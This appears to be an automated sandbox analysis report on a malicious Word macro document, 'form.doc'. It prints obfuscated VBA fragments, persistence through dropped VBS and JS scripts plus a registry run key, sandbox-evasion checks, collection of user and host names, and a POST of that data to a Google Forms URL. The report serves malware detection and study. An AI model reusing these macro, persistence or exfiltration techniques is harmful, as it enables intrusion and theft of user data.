Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AP6fuezipn4, String createobject: Set AM1wg7xyr = CreateObject((Chr(10 + 67) & Chr(85 + 30) & Chr(85 + 35) & Chr(- 97 + 206) & Chr(- 64 + 172) & Chr(61 + - 11) & Chr(- 42 + 88) & Chr(- 77 + 145) & Chr(- 93 + 172) & Chr(- 52 + 129) & Chr(39 + 29) & Chr(87 + 24) & Chr(- 70 + 169) & Chr(- 33 + 150) & Chr(12 + 97) & Chr(- 13 + 114) & Chr(33 + 77) & Chr(- 22 + 138) & Chr(- 65 + 111) & Chr(27 + 24) & Chr(68 + - 22) & Chr(71 + - 23)))	Name: AP6fuezipn4
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AR4ql6nqd, String createobject: Set AU3sjrvsqt3j = CreateObject((Chr(- 94 + 159) & Chr(3 + 65) & Chr(- 12 + 91) & Chr(60 + 8) & Chr(- 85 + 151) & Chr(38 + 8) & Chr(- 2 + 85) & Chr(20 + 96) & Chr(68 + 46) & Chr(83 + 18) & Chr(- 71 + 168) & Chr(62 + 47)))	Name: AR4ql6nqd
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, String createobject: Set AU3sjrvsqt3j = CreateObject((Chr(- 6 + 71) & Chr(89 + - 21) & Chr(52 + 27) & Chr(61 + 7) & Chr(39 + 27) & Chr(- 9 + 55) & Chr(56 + 27) & Chr(- 52 + 168) & Chr(39 + 75) & Chr(5 + 96) & Chr(57 + 40) & Chr(22 + 87)))	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function clearStr, String createobject: Set RE = CreateObject("VBScript.RegExp")	Name: clearStr
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function cuid, String createobject: Set FSO = CreateObject("Scripting.FileSystemObject")	Name: cuid
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function GetUserData, String environ: GetUserData = "UserName: " & Environ$("USERNAME") & " \| " & "ComputerName: " & Environ$("COMPUTERNAME") & " \| " & "UserDomain: " & Environ$("USERDOMAIN")	Name: GetUserData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function sendFormData, String createobject: Set HttpRequest = CreateObject("MSXML2.XMLHTTP")	Name: sendFormData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function folderInit, String wscript: Set sh = CreateObject("WScript.Shell")	Name: folderInit
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function folderInit, String createobject: Set sh = CreateObject("WScript.Shell")	Name: folderInit
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function folderInit, String environ: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	Name: folderInit
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_runer, String wscript: Set sh = CreateObject("WScript.Shell")	Name: ggl_runer
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_runer, String createobject: Set sh = CreateObject("WScript.Shell")	Name: ggl_runer
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_runer, String environ: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	Name: ggl_runer
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_starter, String wscript: Set sh = CreateObject("WScript.Shell")	Name: ggl_starter
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_starter, String createobject: Set sh = CreateObject("WScript.Shell")	Name: ggl_starter
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_starter, String environ: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	Name: ggl_starter
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_hex, String wscript: Set sh = CreateObject("WScript.Shell")	Name: ggl_hex
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_hex, String createobject: Set sh = CreateObject("WScript.Shell")	Name: ggl_hex
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_hex, String environ: WorkPath = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")	Name: ggl_hex
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_hex, String wscript: procID = Shell("wscript " & figName, vbHide)	Name: ggl_hex
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String wscript: Set sh = CreateObject("WScript.Shell")	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String createobject: Set sh = CreateObject("WScript.Shell")	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String wscript: Dim wscript_pthpath	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String wscript: wscript_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\System32\WScript.exe"	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String environ: wscript_pthpath = sh.ExpandEnvironmentStrings("%WINDIR%") + "\System32\WScript.exe"	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String environ: run_pth_scr = sh.ExpandEnvironmentStrings("%ALLUSERSPROFILE%") + "\TransbaseOdbcDriver" + "\starter.vbs"	Name: SetRegData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function SetRegData, String wscript: run_pth = """" & wscript_pthpath & """ """ & run_pth_scr & """"	Name: SetRegData

Document contains an embedded VBA with base64 encoded strings

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_runer, String RGltIG9iakZTTywgb2JqU2hlbGwsIHN0ckZpbGUsIFJlYWRBbGxUZXh0RmlsZQ0KU2V0IG9iakZT
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function ggl_starter, String RGltIG9ialNoZWxsLHBhdGgNClNldCBvYmpTaGVsbCA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCAi
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AutoOpen, String MzNXOTlmZw==

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Show sources

Source: form.doc	Stream path 'Macros/VBA/NewMacros' : found possibly 'ADODB.Stream' functions open, writetext, position, read, write, readtext
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AR4ql6nqd, API Stream.Open()	Name: AR4ql6nqd
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, API Stream.Open()	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, API Stream.Write(???:Byte())	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, API Stream.Write(?????????????????????????4????????????????????????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????:Byte())	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, API Stream.Write(???????????????????????????????????\xfffd???????????????????????????????????????????????????????????????????????\xfffd\xfffd??????????????????????4?????????:Byte())	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, API Stream.Write(?????????????????????????????????????????????????????????????4??????????????????????????????????????????????????????????????/???????????????\xfffd?????????????????????????????????????????????????????????????????????\xfffd?????????????????????????????????????????\xfffd???????????????????????????????\xfffd?????4????\xfffd????????????????????????\xfffd\xfffd????????\xfffd?????????????????????\xfffd????????????????\xfffd\xfffd\xfffd????????????????\xfffd\xfffd??'?????????????\xfffd\xfffd\xfffd?????????????????\xfffd\xfffd\xfffd??????????\xfffd\xfffd??'?????????????'????\xfffd\xfffd\xfffd??????'\xfffd?????????????\xfffd\xfffd\xfffd??????\xfffd????\xfffd\xfffd\xfffd??????????\xfffd\xfffd\xfffd\xfffd??????????\xfffd\xfffd??????????????\xfffd\xfffd\xfffd\xfffd??????\xfffd\xfffd\xfffd???\xfffd\xfffd\xfffd???????4???????????????????????????????????????????????????????????\xfffd????\xfffd?????????????\xfffd???????????????????????????????\xfffd?????4????\xfffd???????	Name: AV0kftndmk
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function sendFormData, API IXMLHTTPRequest.Open("POST","https://docs.google.com/forms/d/1F1zY2cODJxkCCorfv42kif4mxDsZ__BpXourgrkCtyo/formResponse",False)	Name: sendFormData
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AR4ql6nqd, found possibly 'ADODB.Stream' functions open, writetext, position, read	Name: AR4ql6nqd
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function AV0kftndmk, found possibly 'ADODB.Stream' functions open, write, position, readtext	Name: AV0kftndmk

Document contains an embedded VBA with functions possibly related to HTTP operations

Show sources

Source: form.doc	Stream path 'Macros/VBA/NewMacros' : found possibly 'XMLHttpRequest' functions open, setrequestheader, send, readystate, statustext
Source: VBA code instrumentation	OLE, VBA macro: Module NewMacros, Function sendFormData, found possibly 'XMLHttpRequest' functions open, setrequestheader, send, readystate, statustext			Name: sendFormData

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Show sources

Source: form.doc

Stream path 'Macros/VBA/NewMacros' : found possibly 'WScript.Shell' functions expandenvironmentstrings, regwrite, run

Potential malicious VBS script found (suspicious strings)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped file: Set objFSO = CreateObject("Scripting.FileSystemObject")
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped file: Set objShell = WScript.CreateObject( "WScript.Shell" )
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped file: strFile = objShell.ExpandEnvironmentStrings("%ALLUSERSPROFILE%\TransbaseOdbcDriver\LanCradDriver.ini")
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped file: Set objShell = WScript.CreateObject( "WScript.Shell" )
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Dropped file: path = objShell.ExpandEnvironmentStrings("%ALLUSERSPROFILE%\TransbaseOdbcDriver\TransbaseOdbcDriver.js")

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: WINWORD.EXE, wscript.exe	Binary or memory string: Progman
Source: WINWORD.EXE, wscript.exe	Binary or memory string: Program Manager
Source: WINWORD.EXE, wscript.exe	Binary or memory string: Shell_TrayWnd

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Network Connect: 216.58.206.14 187
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Network Connect: 23.43.139.27 80
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Network Connect: 74.125.232.238 80
Source: C:\Windows\System32\wscript.exe	Network Connect: 172.217.22.46 187
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Network Connect: 23.51.117.163 80

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Windows\System32\wscript.exe

System information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\wscript.exe TID: 3264	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3264	Thread sleep time: -60000s >= -60s

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Document contains OLE streams with high entropy indicating encrypted embedded content

Show sources

Source: form.doc

Stream path 'Data' entropy: 7.98136640998 (max. 8.0)

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\wscript.exe

Queries volume information: C:\ VolumeInformation

Behavior Graph

Legend:

Process
Signature
Created File
DNS/IP Info

Yara Overview

No Yara matches

Screenshot

Startup

system is w7_1

WINWORD.EXE (PID: 3052 MD5: 113371C5AC72FCE072F707C55E7845B9)

wscript.exe (PID: 3228 MD5: 979D74799EA6C8B8167869A68DF5204A)

schtasks.exe (PID: 3280 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

cleanup

Created / dropped Files

File Path	Type and Hashes
C:\ProgramData\TransbaseOdbcDriver\LanCradDriver.vbs	Type: ASCII text, with CRLF line terminators MD5: D067E5485CEB07046F59D071484D0CF1 SHA: 64EEAA97045BFBAE22DAF4407B2C6DBC7CD8100C SHA-256: FF745E937502D65A792EC92BF4BD144530007E70851582F046A832AE297F63D0 SHA-512: F4D0DFDFA2D533E2A30DFA7523C378827E7686E09AA10D08D2B8611E9C3662B0B105ECEFF5E6FAD167845A6212032D922B4378006AE6222F419E7D0843051ECE
C:\ProgramData\TransbaseOdbcDriver\TransbaseOdbcDriver.js	Type: ASCII text, with CRLF line terminators MD5: 74C4297333C0F2C5965871CEFD7CEEB1 SHA: 2BBD75C22A1A81D9621515647854FD20B07EAFEC SHA-256: A1CD47FEBC60F11C65146DAB8DC92B8025D7E14D7443B620DCF156AAF791FE3B SHA-512: 3990AC8313F50ED1BE405E8B4943C64BF2C1D138406446A5DF2F2FD8820A12A45DBCA69FBB732507FE879212DDAD4687C8BA9BCB2AC2774FCA7850BCEB541415
C:\ProgramData\TransbaseOdbcDriver\starter.vbs	Type: ASCII text, with CRLF line terminators MD5: 367AF5C56AEB05A492BD68DE20BAF07A SHA: 1A206954ABF76AB374BEADFF2B10E2E6A229791E SHA-256: 2000111067A0CC62762E071EA97595B31038EAF164A5ABE98391E36B015C2E23 SHA-512: 96D957BA3AF6DEB9F41BD0678CB1B4937D53143B9A2C9F47165B42F961733ACDA60F0D0F31FC16351D18ED3123C86128FF10DC98AA16339B14546819E0B896B6
C:\Users\luketaylor\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\23B523C9E7746F715D33C6527C18EB9D	Type: data MD5: DE39111C2EF097408044541A3EC76702 SHA: 9DB5A39ECC4F86E719FC6B95FB79697DF2C41694 SHA-256: 5CBE51BB433AC4157098835A06B045623DF8C4B08BB1369F8C27138641F69B39 SHA-512: 3035B8A9DCDCE7E8DBA6539F38CA39BE4C8D5E7A5BE76033FD4AE4A7E3FAAB3B7B6E62B1B3345F47EEBB0688DF4D1532F87F4F7055932B82542A38385B4F72A6
C:\Users\luketaylor\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8059E9A0D314877E40FE93D8CCFB3C69_4A5995ABF71FDF7B853EF246F7E4900C	Type: data MD5: 98DABD3E4CF32882DD2534AEFC0D27BF SHA: 1B7176556C2736CED41E6FF9117352ECBEDDF5CA SHA-256: 3D509E802BFE718ED1CAE837CB509BB216AB0CA47AA6C58C32E2F6D235B760E7 SHA-512: 44B74BB259FBEE69604B5D2061744D0BE24EB02BAABAACEF0DD6F6EDA6B1C08F531A3F7FDE6F59FE6B90BEE9273ACBAE33C1F1B08B2AEBE4A7D76EFBF2B37F7E
C:\Users\luketaylor\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\828298824EA5549947C17DDABF6871F5_6B5C8B321CA02275A82E95FA81D6DE62	Type: data MD5: 858759167E6224FB5824649084CDFF7A SHA: 8D0870A0C5AA8EFE2E68480B18B6F38F9EA7633C SHA-256: 12E8F43730FC8611BC5A38DF8F7A692A9BA3300D453D23A4DB7313E391AE6B4E SHA-512: 573C2DD51FE8B25C02311DE9590F2EB28308441CCA249E7C782C80A8395B6D493FCE69991C3C4FAF14B768D9309E75CAA5A645411DB3BA58C8C07F7BD8620488
C:\Users\luketaylor\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\23B523C9E7746F715D33C6527C18EB9D	Type: data MD5: B4B7FD9CCF14CCFF4EA497911CC4E4BD SHA: A388CAEC9471EAEFAD7514CB08ABFB47EC34A6FC SHA-256: 5AAC8E5C74D7D501A1F6B621B3ACE69BB350C223083175C61AEE90C36EA546CC SHA-512: 206473A3B054F4BE33835E4C05841DEB307BB50FB97AEC9B6ED417E9D7148530C474FE05F06971C7A8B22089B75C5D5C1C4DC677E47961870E5C9E9810FE61C8
C:\Users\luketaylor\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	Type: data MD5: 8069047C53A97ACB9E3751E056424A6C SHA: C18C36D74429351D2F566C44A3B7AB701A28064A SHA-256: 5E0724FFE07AD4A85F503959318CA4E99E52583CCDADF4C4D0E2147360B62502 SHA-512: CE1C7EA7EA8ACE574EF90AE0BDF16F7287D8443B66A46EA5C882762A53E1E55C2A7ADBDB454DC5FF59D09A62F564E28A274B1C8FCBC989B626746004049B0B51
C:\Users\luketaylor\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8059E9A0D314877E40FE93D8CCFB3C69_4A5995ABF71FDF7B853EF246F7E4900C	Type: data MD5: 40B9B33BA0B37E00B8C5F00BE0DBE909 SHA: FB90486E7DBE06307AE899CBB4E7464EA2FC6510 SHA-256: 9FEC1C2B1943BF4675FCC3E2173CAD577C9D9ED598A37266F4F7B41F2A8DDEC0 SHA-512: 7EE8665E70EE5A7114B787F103C0B8B0CE7711ECE0D27979A26D26A34AFEFA43B57DB9EF440893BDB38FB2666CAA6FD1F537DFA37A774B5747F3C14EF9179039
C:\Users\luketaylor\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\828298824EA5549947C17DDABF6871F5_6B5C8B321CA02275A82E95FA81D6DE62	Type: data MD5: 2CC3946763B6A9C9E5663E2335CB7813 SHA: AD2D0E62557D8B749E7D19BF78F3C981EB1070FE SHA-256: 8FA07433ACEFB8949B5C110DE59707B6974791C056AA3D294DA182EAAF1E8890 SHA-512: A8A11E17D3A48A7542444B800ABD73814041416A2FA93FB7FE0EEDB4A8EB8BDE39BFBFA4CC77C400167D8D2B7D294B06EDFB4A7E64287B7DE07DEDB93223F0C1
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\sig1C0F.tmp	Type: 0 MD5: 0BFEBACAD2A1FC789290F4D745E2E771 SHA: 7B87A56B0C422BA6AB2D8A864C94A53313C3C5FA SHA-256: 704E9CCDD7DCDD03BC3BB64D3A63520DDC63595E0DA5E53E88BBE6DCC9C87F8B SHA-512: 636DF1EDE0355792B0C6CAF88FBC91F48EAAA83C7491CA9742843F7C4E2C46BF09E937E8660A5F214E8458BC68A8E03614884AB1FA53C24F95942EB13727F8BF
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\sig1C0F.tmp:Zone.Identifier	Type: ASCII text, with CRLF line terminators MD5: 187F488E27DB4AF347237FE461A079AD SHA: 6693BA299EC1881249D59262276A0D2CB21F8E64 SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
C:\Users\luketaylor\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{07E242A4-5F99-4E82-9280-C127FAC460D9}.tmp	Type: FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375" MD5: 5D4D94EE7E06BBB0AF9584119797B23A SHA: DBB111419C704F116EFA8E72471DD83E86E49677 SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
C:\Users\luketaylor\AppData\Roaming\Microsoft\Office\Recent\form.LNK	Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Dec 20 13:34:58 2016, mtime=Tue Dec 20 13:34:58 2016, atime=Fri Feb 3 12:21:05 2017, length=322560, window=hide MD5: A9DAD8745ABB85EA3CCA84531B0AB510 SHA: 5882D5C4193D71BA3F1FDA9A0B912D1804FAB711 SHA-256: 1CACB550DB3E68FD5AA8CEDBA46FA4FE52BD2BFD196A17CFFF58CB2B6129091E SHA-512: 1ED829248F864C389377A0FDAD475E0D80D6002825246DDC06ADD4A88E6D3029176FA8B4422AF1805FC39DD1DAFBFFD6F26B0A46F8CCB286FCA1F7F86A72251F
C:\Users\luketaylor\AppData\Roaming\Microsoft\Office\Recent\index.dat	Type: ASCII text, with CRLF line terminators MD5: 9F727BBBA0AF3D0B02D2285DD74C5E63 SHA: DF93F9C204F929E9152D7060EEA7511EC7F6BB0F SHA-256: 12678EFAB1C4F97025CB46A47EBACA47D2454FB024886AB398657AC56A62AEFE SHA-512: 5E88AE0D5FA36A6F5198CE7AD5C54A3CBE154234FA3F4108B19EB462B09666CCB3EC6BE5E1A2790C876A9C94F980A050E5D15436A708597A9A96C5227E3004A2
C:\Users\luketaylor\AppData\Roaming\Microsoft\Templates\~$Normal.dotm	Type: data MD5: D8D4FFAFF79CB210755D3CA0FEDD198B SHA: 4331C7F578F7D52C91C3E4332CCA9EAF5EC9D7B6 SHA-256: ACAD645440343537D55B98998DA0E4933528DDCC033092E56E43EB41A24F0F0E SHA-512: 517D38890F2D72F7FE0E4C34AABA0EBB4AAD5FAED7ABC20F29274E12DDFDAFCF648FB2612DBBE59CCB749AD3896B6E25B173B0B5FAB388416AA9F09893735902
C:\Users\luketaylor\AppData\Roaming\Microsoft\Windows\Cookies\H7OAWIX2.txt	Type: ASCII text MD5: A48642C914B31DF02C94FA1152E91619 SHA: CB7E601DDDDDEF5D5947FBCAA75F1E0AE6476D75 SHA-256: 4B67BEC818055E363C45EE7F6AB16ADD291C12AE4A962D85C30F29B4CA358284 SHA-512: A81A86945FA1551AA760F875124BDC3255611674AE8D62A6C8FC9577ABCE8D0AB0BEF36DC968CA5742AEB6BBD5A1CD5D16893C7C81ABDBFCF5917BD356931F87
C:\~$form.doc	Type: data MD5: D8D4FFAFF79CB210755D3CA0FEDD198B SHA: 4331C7F578F7D52C91C3E4332CCA9EAF5EC9D7B6 SHA-256: ACAD645440343537D55B98998DA0E4933528DDCC033092E56E43EB41A24F0F0E SHA-512: 517D38890F2D72F7FE0E4C34AABA0EBB4AAD5FAED7ABC20F29274E12DDFDAFCF648FB2612DBBE59CCB749AD3896B6E25B173B0B5FAB388416AA9F09893735902

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active
docs.google.com	216.58.206.14	true
clients1.google.com	74.125.232.238	true
script.google.com	172.217.22.46	true
crl.geotrust.com	23.51.117.163	true
g.symcd.com	23.43.139.27	true

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name
23.43.139.27	United States	20940	AkamaiInternationalBV
216.58.206.14	United States	15169	GoogleInc
8.8.8.8	United States	15169	GoogleInc
23.51.117.163	United States	3257	TinetSpA
172.217.22.46	United States	15169	GoogleInc
74.125.232.238	United States	15169	GoogleInc

Static File Info

General
File type:	0
TrID:	Perfect Keyboard macro set (36024/1) 28.81% Microsoft Word document (32009/1) 25.60% Microsoft Excel sheet (30009/1) 24.00% Microsoft Word document (old ver.) (19008/1) 15.20% Generic OLE2 / Multistream Compound File (8008/1) 6.40%
File name:	form.doc
File size:	322560
MD5:	cb25eb3053cc9b5dd6a3beedb04bb734
SHA1:	3fc3e1a0385ff0f494a8a5f764bcf00f555ebac3
SHA256:	111fc266692af396a0db176c49455acef907bb6d16715f5a6a3517362e218658
SHA512:	6116c475fa24df1f3b707e7e8ff8a49978a822149754b10ed588df9a8d1d66d0409bc1c6265b4fc8f6311004e15967820e8a1f60453698d1013b93f245074fab
File Content Preview:	........................>.......................q...............................s...........r..................................................................................................................................................................

File Icon

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "form.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:
Author:	Lara
Keywords:
Comments:
Template:	Normal
Last Saved By:	test
Revion Number:	17
Total Edit Time:	540
Create Time:	2016-06-30 22:51:00
Last Saved Time:	2016-08-30 18:44:00
Number of Pages:	1
Number of Words:	0
Number of Characters:	2
Creating Application:	Microsoft Office Word
Security:	0

Document Summary
Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	983040

Streams with VBA

VBA File Name: NewMacros.bas, Stream Size: 113240

General
Stream Path:	Macros/VBA/NewMacros
VBA File Name:	NewMacros.bas
Stream Size:	113240
Data ASCII:	. . . . . . . . . $ J . . . . . . . . . . . . . . . K . . . i . . . . . . . . . . M ' . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L . . . . . . .
Data Raw:	01 16 01 00 06 f0 00 00 00 24 4a 00 00 d4 00 00 00 c8 02 00 00 ff ff ff ff aa 4b 00 00 92 69 01 00 00 00 00 00 01 00 00 00 4d 27 2e 24 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code with Deobfuscations

Attribute VB_Name = "NewMacros"







































Function AL8vhpb5hk3w(AO3opbjnrp9)

    Dim AM1wg7xyr, AN9vxh3lbsda

    Set AM1wg7xyr = CreateObject((Chr(-57 + 134) & Chr(-21 + 136) & Chr(-26 + 146) & Chr(83 + 26) & Chr(-76 + 184) & Chr(91 + -41) & Chr(32 + 14) & Chr(15 + 53) & Chr(-16 + 95) & Chr(-69 + 146) & Chr(20 + 48) & Chr(-81 + 192) & Chr(97 + 2) & Chr(29 + 88) & Chr(23 + 86) & Chr(26 + 75) & Chr(-28 + 138) & Chr(-5 + 121) & Chr(54 + -8) & Chr(10 + 41) & Chr(74 + -28) & Chr(45 + 3)))

    Set AN9vxh3lbsda = AM1wg7xyr.CreateElement((Chr(-90 + 188) & Chr(52 + 45) & Chr(7 + 108) & Chr(-17 + 118) & Chr(-53 + 107) & Chr(0 + 52)))

    AN9vxh3lbsda.dataType = (Chr(-91 + 189) & Chr(-44 + 149) & Chr(-63 + 173) & Chr(61 + -15) & Chr(-85 + 183) & Chr(5 + 92) & Chr(28 + 87) & Chr(100 + 1) & Chr(100 + -46) & Chr(34 + 18))

    AN9vxh3lbsda.nodeTypedValue = AR4ql6nqd(AO3opbjnrp9)

    AL8vhpb5hk3w = AN9vxh3lbsda.Text

    Set AN9vxh3lbsda = Nothing

    Set AM1wg7xyr = Nothing

End Function



Function AP6fuezipn4(ByVal AQ4ilbevk2j)

    Dim AM1wg7xyr, AN9vxh3lbsda

    Set AM1wg7xyr = CreateObject((Chr(10 + 67) & Chr(85 + 30) & Chr(85 + 35) & Chr(-97 + 206) & Chr(-64 + 172) & Chr(61 + -11) & Chr(-42 + 88) & Chr(-77 + 145) & Chr(-93 + 172) & Chr(-52 + 129) & Chr(39 + 29) & Chr(87 + 24) & Chr(-70 + 169) & Chr(-33 + 150) & Chr(12 + 97) & Chr(-13 + 114) & Chr(33 + 77) & Chr(-22 + 138) & Chr(-65 + 111) & Chr(27 + 24) & Chr(68 + -22) & Chr(71 + -23)))

    Set AN9vxh3lbsda = AM1wg7xyr.CreateElement((Chr(5 + 93) & Chr(-68 + 165) & Chr(51 + 64) & Chr(92 + 9) & Chr(-100 + 154) & Chr(46 + 6)))

    AN9vxh3lbsda.dataType = (Chr(67 + 31) & Chr(-17 + 122) & Chr(4 + 106) & Chr(-51 + 97) & Chr(-9 + 107) & Chr(78 + 19) & Chr(97 + 18) & Chr(-27 + 128) & Chr(48 + 6) & Chr(54 + -2))

    AN9vxh3lbsda.Text = AQ4ilbevk2j

    If AQ4ilbevk2j = "" Then

        AP6fuezipn4 = ""

    Else

        AP6fuezipn4 = AV0kftndmk(AN9vxh3lbsda.nodeTypedValue)

    End If

    Set AN9vxh3lbsda = Nothing

    Set AM1wg7xyr = Nothing

End Function



Function AR4ql6nqd(Text)

    Const AS9fvfrob = 2

    Const AT6yshkqzy = 1

    Dim AU3sjrvsqt3j

